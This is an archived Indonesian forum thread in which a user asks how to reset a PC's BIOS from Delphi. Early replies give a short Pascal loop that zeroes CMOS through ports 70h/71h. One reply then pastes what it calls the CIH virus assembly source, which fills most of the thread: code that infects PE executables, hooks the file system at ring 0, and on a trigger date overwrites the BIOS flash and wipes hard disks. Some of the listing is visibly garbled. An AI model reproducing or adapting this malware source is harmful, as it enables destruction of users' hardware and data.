Arsip: Cara clear Bios

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more 16 years ago


Asslamu'alaikum, Haloo semuanya gimana cara mereset bios menggunakan delphi ? terima kasih atas bantuannya. wassalamu'alaikum
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more 16 years ago


heemm.... $>mode copy-paste on kode pascal ini berfungsi di masa lalu. entah pc pc sekarang masih bisa apa tidak.

   iLoop:= 0; 
     Port[$70]:= iLoop; 
     Port[$71]:= 0;
   until iLoop = 255 
masalah lagi, penulisan port secara langsung sudah tidak dipernankan di delphi masa kini. bisa di kombinasikan dengan [asm:1:596d8a6943] asm MOV DX, wNomorPort MOV AL, iNilai OUT DX, AL end; [/asm:1:596d8a6943] resiko ditanggung yang nanggung. search dulu aja di google, daripada daripada (search dulu, ada dihalaman pertama tuh)
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more 16 years ago


xi xi xi, :D jangan-jangan mas Luri dulu yang ngarang buku 'membedah PC dengan Turbo Pascal?' hayo ngaku
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more 16 years ago


sik.. sik .. sik... om Luri.. kode tadi gak bisa sembarangan di eksekusi, karena perintah tersebut membutuhkan hak akses (privilege) system setingkat kernel (ring 0), sementara aplikasi yang biasanya berjalan ada tingkat user (ring 3) - halah istilah apalagi nih.. :D untuk akses port atau hardware ring 0, sebaiknya menggunakan kernel driver, seperti NTPort atau IOPort, saya lupa namanya.. CMMIW, udah pada lupa semua, hanya itu yang tertinggal.. :D
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more 16 years ago


wah...wah...wah...bicarain hal yang ngeri nih...mungkin bisa ambil contoh referensinya yang mirip kayak gituan yaitu virus CIH tapi gunain b.assembler. neh kalo mo source codenya :

;                       The Virus Program Information                        
;       Designer : CIH                  Original Place : TTIT of Taiwan      
;       Create Date : 04/26/1998        Now Version : 1.2                    
;       Modification Time : 05/21/1998                                     
;                       Modification History                                 
;       v1.0    1. Create the Virus Program.                                 
;               2. The Virus Modifies IDT to Get Ring0 Privilege.            
;   04/26/1998  3. Virus Code doesn't Reload into System.                  
;               4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. 
;               5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook.  
;               6. When System Opens Existing PE File, the File will be      
;                  Infected, and the File doesn't be Reinfected.           
;               7. It is also Infected, even the File is Read-Only.          
;               8. When the File is Infected, the Modification Date and Time 
;                  of the File also don't be Changed.                        
;               9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call  
;                  Previous FileSystemApiHook, it will Call the Function     
;                  that the IFS Manager Would Normally Call to Implement     
;                  this Particular I/O Request.                              
;              10. The Virus Size is only 656 Bytes.                         
;       v1.1    1. Especially, the File that be Infected will not Increase   
;                  it's Size...   ^__^                                       
;   05/15/1998  2. Hook and Modify Structured Exception Handing.             
;                  When Exception Error Occurs, Our OS System should be in   
;                  Windows NT. So My Cute Virus will not Continue to Run,    
;                  it will Jmup to Original Application to Run.              
;               3. Use Better Algorithm, Reduce Virus Code Size.             
;               4. The Virus "Basic" Size is only 796 Bytes.                 
;       v1.2    1. Kill All HardDisk, and BIOS... Super... Killer...         
;               2. Modify the Bug of v1.1                                    
;   05/21/1998  3. The Virus "Basic" Size is 1003 Bytes.                     

;               Original PE Executable File(Don't Modify this Section)     

                db      04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
                db      004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
                db      0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
                db      00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
                db      021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
                db      069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
                db      061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
                db      074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
                db      020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
                db      06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
                db      024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
                db      0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
                db      00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
                db      000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
                db      000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
                db      004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
                db      000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
                db      000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
                db      000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
                db      000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
                db      000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
                db      000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                dd      00000000h, VirusSize
OriginalAppEXE  ENDS
;                       My Virus Game                                      

;                     Constant Define                     
TRUE                    =       1
FALSE                   =       0
DEBUG                   =       TRUE
MajorVirusVersion       =       1
MinorVirusVersion       =       2
VirusVersion            =       MajorVirusVersion 10h+MinorVirusVersion
        FirstKillHardDiskNumber =       81h
        HookExceptionNumber     =       05h
        FirstKillHardDiskNumber =       80h
        HookExceptionNumber     =       03h
FileNameBufferSize      =       7fh
VirusGame               SEGMENT
                        ASSUME  CS:VirusGame, DS:VirusGame, SS:VirusGame
                        ASSUME  ES:VirusGame, FS:VirusGame, GS:VirusGame
;              Ring3 Virus Game Initial Program           
                        push    ebp
;  Let's Modify Structured Exception  
;  Handing, Prevent Exception Error   
;  Occurrence, Especially in NT.      
                        lea     eax, [esp-04h 2]
                        xor     ebx, ebx
                        xchg    eax, fs:[ebx]
                        call    @0
                        pop     ebx
                        lea     ecx, StopToRunVirusCode-@0[ebx]
                        push    ecx
                        push    eax
;   Let's Modify                      
;   IDT(Interrupt Descriptor Table)   
;   to Get Ring0 Privilege...         
                        push    eax             ;
                        sidt    [esp-02h]       ; Get IDT Base Address
                        pop     ebx             ;
                        add     ebx, HookExceptionNumber08h+04h ; ZF = 0
                        mov     ebp, [ebx]      ; Get Exception Base
                        mov     bp, [ebx-04h]   ; Entry Point
                        lea     esi, MyExceptionHook-@1[ecx]
                        push    esi
                        mov     [ebx-04h], si           ;
                        shr     esi, 16                 ; Modify Exception
                        mov     [ebx+02h], si           ; Entry Point Address
                        pop     esi
;  Generate Exception to Get Ring0    
                        int     HookExceptionNumber     ; GenerateException
ReturnAddressOfEndException     =       $
;  Merge All Virus Code Section       
                        push    esi
                        mov     esi, eax
                        mov     ecx, [eax-04h]
                        rep     movsb
                        sub     eax, 08h
                        mov     esi, [eax]
                        or      esi, esi
                        jz      QuitLoopOfMergeAllVirusCodeSection ; ZF = 1
                        jmp     LoopOfMergeAllVirusCodeSection
                        pop     esi
;  Generate Exception Again           
                        int     HookExceptionNumber     ; GenerateException Again
;  Let's Restore                      
;  Structured Exception Handing       
                        xor     ebx, ebx
                        jmp     RestoreSE
;  When Exception Error Occurs,       
;  Our OS System should be in NT.     
;  So My Cute Virus will not          
;  Continue to Run, it Jmups to       
;  Original Application to Run.       
@1                      =       StopToRunVirusCode
                        xor     ebx, ebx
                        mov     eax, fs:[ebx]
                        mov     esp, [eax]
                        pop     dword ptr fs:[ebx]
                        pop     eax
;  Return Original App to Execute     
                        pop     ebp
                        push    00401000h       ; Push Original
OriginalAddressOfEntryPoint     =       $-4     ; App Entry Point to Stack
                        ret     ; Return to Original App Entry Point
;              Ring0 Virus Game Initial Program           
@2                      =       MyExceptionHook
                        jz      InstallMyFileSystemApiHook
;  Do My Virus Exist in System !?     
                        mov     ecx, dr0
                        jecxz   AllocateSystemMemoryPage
                        add     dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
;  Return to Ring3 Initial Program    
                        mov     [ebx-04h], bp   ;
                        shr     ebp, 16         ; Restore Exception
                        mov     [ebx+02h], bp   ;
;  Allocate SystemMemory Page to Use  
                        mov     dr0, ebx        ; Set the Mark of My Virus Exist in System
                        push    00000000fh      ;
                        push    ecx             ;
                        push    0ffffffffh      ;
                        push    ecx             ;
                        push    ecx             ;
                        push    ecx             ;
                        push    000000001h      ;
                        push    000000002h      ;
                        int     20h             ; VMMCALL _PageAllocate
_PageAllocate           =       $               ;
                        dd      00010053h       ; Use EAX, ECX, EDX, and flags
                        add     esp, 08h 04h
                        xchg    edi, eax        ; EDI = SystemMemory Start Address
                        lea     eax, MyVirusStart-@2[esi]
                        iretd   ; Return to Ring3 Initial Program
;   Install My File System Api Hook   
                        lea     eax, FileSystemApiHook-@6[edi]
                        push    eax  ;
                        int     20h  ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook =       $       ;
                        dd      00400067h       ; Use EAX, ECX, EDX, and flags
                        mov     dr0, eax        ; Save OldFileSystemApiHook Address
                        pop     eax     ; EAX = FileSystemApiHook Address
                        ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
                        mov     ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
                        mov     edx, [ecx]
                        mov     OldInstallFileSystemApiHook-@3[eax], edx
                        ; Modify IFSMgr_InstallFileSystemApiHook Entry Point
                        lea     eax, InstallFileSystemApiHook-@3[eax]
                        mov     [ecx], eax
                        jmp     ExitRing0Init
;               Code Size of Merge Virus Code Section     
CodeSizeOfMergeVirusCodeSection         =       offset $
;               IFSMgr_InstallFileSystemApiHook           
                        push    ebx
                        call    @4      ;
@4:                                     ;
                        pop     ebx     ; mov ebx, offset FileSystemApiHook
                        add     ebx, FileSystemApiHook-@4       ;
                        push    ebx
                        int     20h  ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook  =       $
                        dd      00400068h       ; Use EAX, ECX, EDX, and flags
                        pop     eax
                        ; Call Original IFSMgr_InstallFileSystemApiHook
                        ; to Link Client FileSystemApiHook
                        push    dword ptr [esp+8]
                        call    OldInstallFileSystemApiHook-@3[ebx]
                        pop     ecx
                        push    eax
                        ; Call Original IFSMgr_InstallFileSystemApiHook
                        ; to Link My FileSystemApiHook
                        push    ebx
                        call    OldInstallFileSystemApiHook-@3[ebx]
                        pop     ecx
                        mov     dr0, eax        ; Adjust OldFileSystemApiHook Address
                        pop     eax
                        pop     ebx
;                       Static Data                       
OldInstallFileSystemApiHook     dd      ?
;               IFSMgr_FileSystemHook                     
;   IFSMgr_FileSystemHook Entry Point 
@3                      =       FileSystemApiHook
                        call    @5      ;
@5:                                     ;
                        pop     esi     ; mov esi, offset
                        add     esi, VirusGameDataStartAddress-@5
;   Is OnBusy !?                      
                        test    byte ptr (OnBusy-@6)[esi], 01h  ; if ( OnBusy )
                        jnz     pIFSFunc                        ; goto pIFSFunc
;   Is OpenFile !?                    
                        ; if ( NotOpenFile )
                        ; goto prevhook
                        lea     ebx, [esp+20h+04h+04h]
                        cmp     dword ptr [ebx], 00000024h
                        jne     prevhook
;   Enable OnBusy                     
                        inc     byte ptr (OnBusy-@6)[esi]       ; Enable OnBusy
;   Get FilePath's DriveNumber,       
;   then Set the DriveName to         
;   FileNameBuffer.                   
;  Ex. If DriveNumber is 03h,         
;      DriveName is 'C:'.             
                        ; mov esi, offset FileNameBuffer
                        add     esi, FileNameBuffer-@6
                        push    esi
                        mov     al, [ebx+04h]
                        cmp     al, 0ffh
                        je      CallUniToBCSPath
                        add     al, 40h
                        mov     ah, ':'
                        mov     [esi], eax
                        inc     esi
                        inc     esi
;  UniToBCSPath                       
;   This Service Converts             
;   a Canonicalized Unicode Pathname  
;   to a Normal Pathname in the       
;   Specified BCS Character Set.      
                        push    00000000h
                        push    FileNameBufferSize
                        mov     ebx, [ebx+10h]
                        mov     eax, [ebx+0ch]
                        add     eax, 04h
                        push    eax
                        push    esi
                        int     20h     ; VXDCall UniToBCSPath
UniToBCSPath            =       $
                        dd      00400041h
                        add     esp, 04h04h
;  Is FileName '.EXE' !?              
                        ; cmp [esi+eax-04h], '.EXE'
                        cmp     [esi+eax-04h], 'EXE.'
                        pop     esi
                        jne     DisableOnBusy
;  Only for Debug                     
                        ; cmp [esi+eax-06h], 'FUCK'
                        cmp     [esi+eax-06h], 'KCUF'
                        jne     DisableOnBusy
;  Is Open Existing File !?           
                        ; if ( NotOpenExistingFile )
                        ; goto DisableOnBusy
                        cmp     word ptr [ebx+18h], 01h
                        jne     DisableOnBusy
;  Get Attributes of the File         
                        mov     ax, 4300h
                        int     20h     ; VXDCall IFSMgr_Ring0_FileIO
IFSMgr_Ring0_FileIO     =       $
                        dd      00400032h
                        jc      DisableOnBusy
                        push    ecx
;  Get IFSMgr_Ring0_FileIO Address    
                        mov     edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
                        mov     edi, [edi]
;  Is Read-Only File !?               
                        test    cl, 01h
                        jz      OpenFile
;  Modify Read-Only File to Write     
                        mov     ax, 4301h
                        xor     ecx, ecx
                        call    edi     ; VXDCall IFSMgr_Ring0_FileIO
;  Open File                          
                        xor     eax, eax
                        mov     ah, 0d5h
                        xor     ecx, ecx
                        xor     edx, edx
                        inc     edx
                        mov     ebx, edx
                        inc     ebx
                        call    edi     ; VXDCall IFSMgr_Ring0_FileIO
                        xchg    ebx, eax        ; mov ebx, FileHandle
;  Need to Restore                    
;  Attributes of the File !?          
                        pop     ecx
                        test    cl, 01h
                        jz      IsOpenFileOK
;  Restore Attributes of the File     
                        mov     ax, 4301h
                        call    edi     ; VXDCall IFSMgr_Ring0_FileIO
;  Is Open File OK !?                 
                        jc      DisableOnBusy
;  Open File Already Succeed.   ^__^  
                        push    esi     ; Push FileNameBuffer Address to Stack
                        pushf           ; Now CF = 0, Push Flag to Stack
                        add     esi, DataBuffer-@7 ; mov esi, offset DataBuffer
;  Get OffsetToNewHeader    
                        xor     eax, eax
                        mov     ah, 0d6h
                        ; For Doing Minimal VirusCode's Length,
                        ; I Save EAX to EBP.
                        mov     ebp, eax
                        xor     ecx, ecx
                        mov     cl, 04h
                        xor     edx, edx
                        mov     dl, 3ch
                        call    edi     ; VXDCall IFSMgr_Ring0_FileIO
                        mov     edx, [esi]
;  Get 'PE\0' Signature     
;  of ImageFileHeader, and  
;  Infected Mark.           
                        dec     edx
                        mov     eax, ebp
                        call    edi     ; VXDCall IFSMgr_Ring0_FileIO
;  Is PE !?                 
;   Is the File             
;   Already Infected !?     
                        ; cmp [esi], '\0PE\0'
                        cmp     dword ptr [esi], 00455000h
                        jne     CloseFile
;   The File is                   ^o^ 
;   PE(Portable Executable) indeed.   
;  The File isn't also Infected.      
;  Start to Infect the File           
;   Registers Use Status Now :        
;   EAX = 04h                         
;   EBX = File Handle                 
;   ECX = 04h                         
;   EDX = 'PE\0\0' Signature of       
;         ImageFileHeader Pointer's   
;         Former Byte.                
;   ESI = DataBuffer Address ==> @8   
;   EDI = IFSMgr_Ring0_FileIO Address 
;   EBP = D600h ==> Read Data in File 
;  Stack Dump :                       
;  ESP => -------------------------   
;         |       EFLAG(CF=0)     |   
;         -------------------------   
;         | FileNameBufferPointer |   
;         -------------------------   
;         |          EDI          |   
;         -------------------------   
;         |          ESI          |   
;         -------------------------   
;         |          EBP          |   
;         -------------------------   
;         |          ESP          |   
;         -------------------------   
;         |          EBX          |   
;         -------------------------   
;         |          EDX          |   
;         -------------------------   
;         |          ECX          |   
;         -------------------------   
;         |          EAX          |   
;         -------------------------   
;         |     Return Address    |   
;         -------------------------   
                        push    ebx     ; Save File Handle
                        push    00h     ; Set VirusCodeSectionTableEndMark
;  Let's Set the            
;  Virus' Infected Mark     
                        push    01h     ; Size
                        push    edx     ; Pointer of File
                        push    edi     ; Address of Buffer
;  Save ESP Register        
                        mov     dr1, esp
;  Let's Set the            
;  NewAddressOfEntryPoint   
;  ( Only First Set Size )  
                        push    eax     ; Size
;  Let's Read               
;  Image Header in File     
                        mov     eax, ebp
                        mov     cl, SizeOfImageHeaderToRead
                        add     edx, 07h ; Move EDX to NumberOfSections
                        call    edi      ; VXDCall IFSMgr_Ring0_FileIO
;  Let's Set the            
;  NewAddressOfEntryPoint   
;  ( Set Pointer of File,   
;    Address of Buffer   )  
                        lea     eax, (AddressOfEntryPoint-@8)[edx]
                        push    eax     ; Pointer of File
                        lea     eax, (NewAddressOfEntryPoint-@8)[esi]
                        push    eax     ; Address of Buffer
;  Move EDX to the Start    
;  of SectionTable in File  
                        movzx   eax, word ptr (SizeOfOptionalHeader-@8)[esi]
                        lea     edx, [eax+edx+12h]
;  Let's Get                
;  Total Size of Sections   
                        mov     al, SizeOfScetionTable
                        ; I Assume NumberOfSections <= 0ffh
                        mov     cl, (NumberOfSections-@8)[esi]
                        mul     cl
;  Let's Set Section Table  
                        ; Move ESI to the Start of SectionTable
                        lea     esi, (StartOfSectionTable-@8)[esi]
                        push    eax     ; Size
                        push    edx     ; Pointer of File
                        push    esi     ; Address of Buffer
;  The Code Size of Merge   
;  Virus Code Section and   
;  Total Size of Virus      
;  Code Section Table Must  
;  be Small or Equal the    
;  Unused Space Size of     
;  Following Section Table  
                        inc     ecx
                        push    ecx     ; Save NumberOfSections+1
                        shl     ecx, 03h
                        push    ecx     ; Save TotalSizeOfVirusCodeSectionTable
                        add     ecx, eax
                        add     ecx, edx
                        sub     ecx, (SizeOfHeaders-@9)[esi]
                        jnc     short OnlySetInfectedMark
                        not     ecx
                        inc     ecx
                        cmp     cx, small CodeSizeOfMergeVirusCodeSection
                        jb      OnlySetInfectedMark
;  Save Original            
;  Address of Entry Point   
                        ; Save My Virus First Section Code
                        ; Size of Following Section Table...
                        ; ( Not Include the Size of Virus Code Section Table )
                        push    ecx
                        xchg    ecx, eax        ; ECX = Size of Section Table
                        mov     eax, (AddressOfEntryPoint-@9)[esi]
                        add     eax, (ImageBase-@9)[esi]
                        mov     (OriginalAddressOfEntryPoint-@9)[esi], eax
;  Read All Section Tables  
                        mov     eax, ebp
                        call    edi     ; VXDCall IFSMgr_Ring0_FileIO
;  Let's Set Total Virus    
;  Code Section Table       
                        ; EBX = My Virus First Section Code
                        ;       Size of Following Section Table
                        pop     ebx
                        pop     edi     ; EDI = TotalSizeOfVirusCodeSectionTable
                        pop     ecx     ; ECX = NumberOfSections+1
                        push    edi             ; Size
                        add     edx, eax
                        push    edx             ; Pointer of File
                        add     eax, esi
                        push    eax             ; Address of Buffer
;  Set the First Virus      
;  Code Section Size in     
;  VirusCodeSectionTable    
                        lea     eax, [eax+edi-04h]
                        mov     [eax], ebx
;  Let's Set My Virus       
;  First Section Code       
                        push    ebx     ; Size
                        add     edx, edi
                        push    edx     ; Pointer of File
                        lea     edi, (MyVirusStart-@9)[esi]
                        push    edi     ; Address of Buffer
;  Let's Modify the         
;  AddressOfEntryPoint to   
;  My Virus Entry Point     
                        mov     (NewAddressOfEntryPoint-@9)[esi], edx
;  Setup Initial Data       
                        lea     edx, [esi-SizeOfScetionTable]
                        mov     ebp, offset VirusSize
                        jmp     StartToWriteCodeToSections
;  Write Code to Sections   
                        add     edx, SizeOfScetionTable
                        mov     ebx, (SizeOfRawData-@9)[edx]
                        sub     ebx, (VirtualSize-@9)[edx]
                        jbe     EndOfWriteCodeToSections
                        push    ebx     ; Size
                        sub     eax, 08h
                        mov     [eax], ebx
                        mov     ebx, (PointerToRawData-@9)[edx]
                        add     ebx, (VirtualSize-@9)[edx]
                        push    ebx     ; Pointer of File
                        push    edi     ; Address of Buffer
                        mov     ebx, (VirtualSize-@9)[edx]
                        add     ebx, (VirtualAddress-@9)[edx]
                        add     ebx, (ImageBase-@9)[esi]
                        mov     [eax+4], ebx
                        mov     ebx, [eax]
                        add     (VirtualSize-@9)[edx], ebx
                        ; Section contains initialized data ==> 00000040h
                        ; Section can be Read.              ==> 40000000h
                        or      (Characteristics-@9)[edx], 40000040h
                        sub     ebp, ebx
                        jbe     SetVirusCodeSectionTableEndMark
                        add     edi, ebx        ; Move Address of Buffer
                        loop    LoopOfWriteCodeToSections
;  Only Set Infected Mark   
                        mov     esp, dr1
                        jmp     WriteVirusCodeToFile
;  Set Virus Code           
;  Section Table End Mark   
                        ; Adjust Size of Virus Section Code to Correct Value
                        add     [eax], ebp
                        add     [esp+08h], ebp
                        ; Set End Mark
                        xor     ebx, ebx
                        mov     [eax-04h], ebx
;  When VirusGame Calls     
;  VxDCall, VMM Modifies    
;  the 'int 20h' and the    
;  'Service Identifier'     
;  to 'Call [XXXXXXXX]'.    
;   Before Writing My Virus 
;   to File, I Must Restore 
;   them First.     ^__^    
                        lea     eax, (LastVxDCallAddress-2-@9)[esi]
                        mov     cl, VxDCallTableSize
                        mov     word ptr [eax], 20cdh
                        mov     edx, (VxDCallIDTable+(ecx-1)04h-@9)[esi]
                        mov     [eax+2], edx
                        movzx   edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi]
                        sub     eax, edx
                        loop    LoopOfRestoreVxDCallID
;  Let's Write              
;  Virus Code to the File   
                        mov     eax, dr1
                        mov     ebx, [eax+10h]
                        mov     edi, [eax]
                        pop     ecx
                        jecxz   SetFileModificationMark
                        mov     esi, ecx
                        mov     eax, 0d601h
                        pop     edx
                        pop     ecx
                        call    edi     ; VXDCall IFSMgr_Ring0_FileIO
                        jmp     LoopOfWriteVirusCodeToFile
;  Let's Set CF = 1 ==>     
;  Need to Restore File     
;  Modification Time        
                        pop     ebx
                        pop     eax
                        stc             ; Enable CF(Carry Flag)
;  Close File                         
                        xor     eax, eax
                        mov     ah, 0d7h
                        call    edi     ; VXDCall IFSMgr_Ring0_FileIO
;  Need to Restore File Modification  
;  Time !?                            
                        pop     esi
                        jnc     IsKillComputer
;  Restore File Modification Time     
                        mov     ebx, edi
                        mov     ax, 4303h
                        mov     ecx, (FileModificationTime-@7)[esi]
                        mov     edi, (FileModificationTime+2-@7)[esi]
                        call    ebx     ; VXDCall IFSMgr_Ring0_FileIO
;  Disable OnBusy                     
                        dec     byte ptr (OnBusy-@7)[esi]       ; Disable OnBusy
;  Call Previous FileSystemApiHook    
                        mov     eax, dr0        ;
                        jmp     [eax]           ; Jump to prevhook
;  Call the Function that the IFS     
;  Manager Would Normally Call to     
;  Implement this Particular I/O      
;  Request.                           
                        mov     ebx, esp
                        push    dword ptr [ebx+20h+04h+14h]     ; Push pioreq
                        call    [ebx+20h+04h]                   ; Call pIFSFunc
                        pop     ecx                             ;
                        mov     [ebx+1ch], eax  ; Modify EAX Value in Stack
;  After Calling pIFSFunc,  
;  Get Some Data from the   
;  Returned pioreq.         
                        cmp     dword ptr [ebx+20h+04h+04h], 00000024h
                        jne     QuitMyVirusFileSystemHook
;  Get the File   
;  Modification   
;  Date and Time  
;  in DOS Format. 
                        mov     eax, [ecx+28h]
                        mov     (FileModificationTime-@6)[esi], eax
;  Quit My Virus'           
;  IFSMgr_FileSystemHook    
;  Kill Computer !? ...    ^_^       
                        ; Get Now Month from BIOS CMOS
                        mov     ax, 0708h
                        out     70h, al
                        in      al, 71h
                        xchg    ah, al
                        ; Get Now Day from BIOS CMOS
                        out     70h, al
                        in      al, 71h
                        xor     ax, 0426h       ; 04/26/????
                        jne     DisableOnBusy
;   Kill Kill Kill Kill Kill Kill Kill 
;  Kill BIOS EEPROM         
                        mov     bp, 0cf8h
                        lea     esi, IOForEEPROM-@7[esi]
;  Show BIOS Page in    
;  000E0000 - 000EFFFF  
;     (   64 KB   )     
                        mov     edi, 8000384ch
                        mov     dx, 0cfeh
                        call    esi
;  Show BIOS Page in    
;  000F0000 - 000FFFFF  
;     (   64 KB   )     
                        mov     di, 0058h
                        dec     edx                                     ; and al,0fh
                        mov     word ptr (BooleanCalculateCode-@10)[esi], 0f24h
                        call    esi
;  Show the BIOS Extra  
;  ROM Data in Memory   
;  000E0000 - 000E01FF  
;    (   512 Bytes   )  
;  , and the Section    
;  of Extra BIOS can    
;  be Writted...        
                        lea     ebx, EnableEEPROMToWrite-@10[esi]
                        mov     eax, 0e5555h
                        mov     ecx, 0e2aaah
                        call    ebx
                        mov     byte ptr [eax], 60h
                        push    ecx
                        loop    $
;  Kill the BIOS Extra  
;  ROM Data in Memory   
;  000E0000 - 000E007F  
;    (   80h Bytes   )  
                        xor     ah, ah
                        mov     [eax], al
                        xchg    ecx, eax
                        loop    $
;  Show and Enable the  
;  BIOS Main ROM Data   
;  000E0000 - 000FFFFF  
;    (   128 KB   )     
;  can be Writted...    
                        mov     eax, 0f5555h
                        pop     ecx
                        mov     ch, 0aah
                        call    ebx
                        mov     byte ptr [eax], 20h
                        loop    $
;  Kill the BIOS Main   
;  ROM Data in Memory   
;  000FE000 - 000FE07F  
;    (   80h Bytes   )  
                        mov     ah, 0e0h
                        mov     [eax], al
;  Hide BIOS Page in    
;  000F0000 - 000FFFFF  
;     (   64 KB   )     
                                                                        ; or al,10h
                        mov     word ptr (BooleanCalculateCode-@10)[esi], 100ch
                        call    esi
;  Kill All HardDisk        
;   IOR Structure of IOS_SendCommand Needs          
;  ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ??  
;  00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0  
;  ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??  
;  ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??  
;  ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ??  
                        xor     ebx, ebx
                        mov     bh, FirstKillHardDiskNumber
                        push    ebx
                        sub     esp, 2ch
                        push    0c0001000h
                        mov     bh, 08h
                        push    ebx
                        push    ecx
                        push    ecx
                        push    ecx
                        push    40000501h
                        inc     ecx
                        push    ecx
                        push    ecx
                        mov     esi, esp
                        sub     esp, 0ach
                        int     20h
                        dd      00100004h       ; VXDCall IOS_SendCommand
                        cmp     word ptr [esi+06h], 0017h
                        je      KillNextDataSection
                        inc     byte ptr [esi+4dh]
                        jmp     LoopOfKillHardDisk
                        add     dword ptr [esi+10h], ebx
                        mov     byte ptr [esi+4dh], FirstKillHardDiskNumber
                        jmp     LoopOfKillHardDisk
;  Enable EEPROM to Write   
                        mov     [eax], cl
                        mov     [ecx], al
                        mov     byte ptr [eax], 80h
                        mov     [eax], cl
                        mov     [ecx], al
;  IO for EEPROM            
@10                     =       IOForEEPROM
                        xchg    eax, edi
                        xchg    edx, ebp
                        out     dx, eax
                        xchg    eax, edi
                        xchg    edx, ebp
                        in      al, dx
BooleanCalculateCode    =       $
                        or      al, 44h
                        xchg    eax, edi
                        xchg    edx, ebp
                        out     dx, eax
                        xchg    eax, edi
                        xchg    edx, ebp
                        out     dx, al
;                      Static Data                        
LastVxDCallAddress      =       IFSMgr_Ring0_FileIO
VxDCallAddressTable     db      00h
                        db      IFSMgr_RemoveFileSystemApiHook-_PageAllocate
                        db      UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
                        db      IFSMgr_Ring0_FileIO-UniToBCSPath
VxDCallIDTable          dd      00010053h, 00400068h, 00400041h, 00400032h
VxDCallTableSize        =       ($-VxDCallIDTable)/04h
;                 Virus Version Copyright                 
